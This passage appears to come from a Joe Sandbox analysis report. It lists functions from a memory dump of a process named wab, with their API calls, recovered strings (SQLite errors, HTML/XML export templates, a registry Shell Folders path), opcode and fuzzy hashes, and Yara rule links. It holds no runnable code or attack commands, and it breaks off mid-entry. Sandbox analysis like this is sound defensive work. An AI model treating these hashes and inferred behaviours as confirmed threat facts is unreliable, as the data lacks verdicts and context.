                      • API String ID: 4218492932-0
                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                      • memcpy.MSVCRT ref: 0044A8BF
                      • memcpy.MSVCRT ref: 0044A90C
                      • memcpy.MSVCRT ref: 0044A988
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                      • memcpy.MSVCRT ref: 0044A9D8
                      • memcpy.MSVCRT ref: 0044AA19
                      • memcpy.MSVCRT ref: 0044AA4A
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                      Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                      • API String ID: 3510742995-2446657581
                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                      Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                      • memset.MSVCRT ref: 00405ABB
                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                      • SetFocus.USER32(?), ref: 00405B76
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                      Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfwcscat
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 384018552-4153097237
                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                      Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetwcschr
                      • String ID: 0$6
                      • API String ID: 2029023288-3849865405
                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                      Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                      • memset.MSVCRT ref: 00405455
                      • memset.MSVCRT ref: 0040546C
                      • memset.MSVCRT ref: 00405483
                      • memcpy.MSVCRT ref: 00405498
                      • memcpy.MSVCRT ref: 004054AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy$ErrorLast
                      • String ID: 6$\
                      • API String ID: 404372293-1284684873
                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                      Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                      Download Yara Rule
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                      • wcscpy.MSVCRT ref: 0040A0D9
                      • wcscat.MSVCRT ref: 0040A0E6
                      • wcscat.MSVCRT ref: 0040A0F5
                      • wcscpy.MSVCRT ref: 0040A107
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                      • String ID:
                      • API String ID: 1331804452-0
                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                      Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: advapi32.dll
                      • API String ID: 2012295524-4050573280
                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                      Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • <?xml version="1.0" ?>, xrefs: 0041007C
                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                      • <%s>, xrefs: 004100A6
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                      • API String ID: 3473751417-2880344631
                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                      Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset
                      • String ID: %2.2X
                      • API String ID: 2521778956-791839006
                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                      Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintfwcscpy
                      • String ID: dialog_%d$general$menu_%d$strings
                      • API String ID: 999028693-502967061
                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                      Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memsetstrlen
                      • String ID:
                      • API String ID: 2350177629-0
                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                      Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                      • API String ID: 2221118986-1606337402
                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                      Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                      • String ID:
                      • API String ID: 265355444-0
                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                      Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                      • memset.MSVCRT ref: 0040C439
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      • memset.MSVCRT ref: 0040C4D0
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                      • String ID:
                      • API String ID: 1973883786-0
                      • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                      • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                      Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004116FF
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2618321458-3614832568
                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                      Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 004185FC
                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@AttributesFilememset
                      • String ID:
                      • API String ID: 776155459-0
                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                      Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                      • malloc.MSVCRT ref: 00417524
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                      • String ID:
                      • API String ID: 2308052813-0
                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                      Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PathTemp$??3@
                      • String ID: %s\etilqs_$etilqs_
                      • API String ID: 1589464350-1420421710
                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                      Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 0040FDD5
                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 0040FE1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                      • String ID: <%s>%s</%s>$</item>$<item>
                      • API String ID: 1775345501-2769808009
                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                      Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                      Download Yara Rule
                      APIs
                      • wcscpy.MSVCRT ref: 0041477F
                      • wcscpy.MSVCRT ref: 0041479A
                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$CloseCreateFileHandle
                      • String ID: General
                      • API String ID: 999786162-26480598
                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                      Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLastMessage_snwprintf
                      • String ID: Error$Error %d: %s
                      • API String ID: 313946961-1552265934
                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                      Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: foreign key constraint failed$new$oid$old
                      • API String ID: 0-1953309616
                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
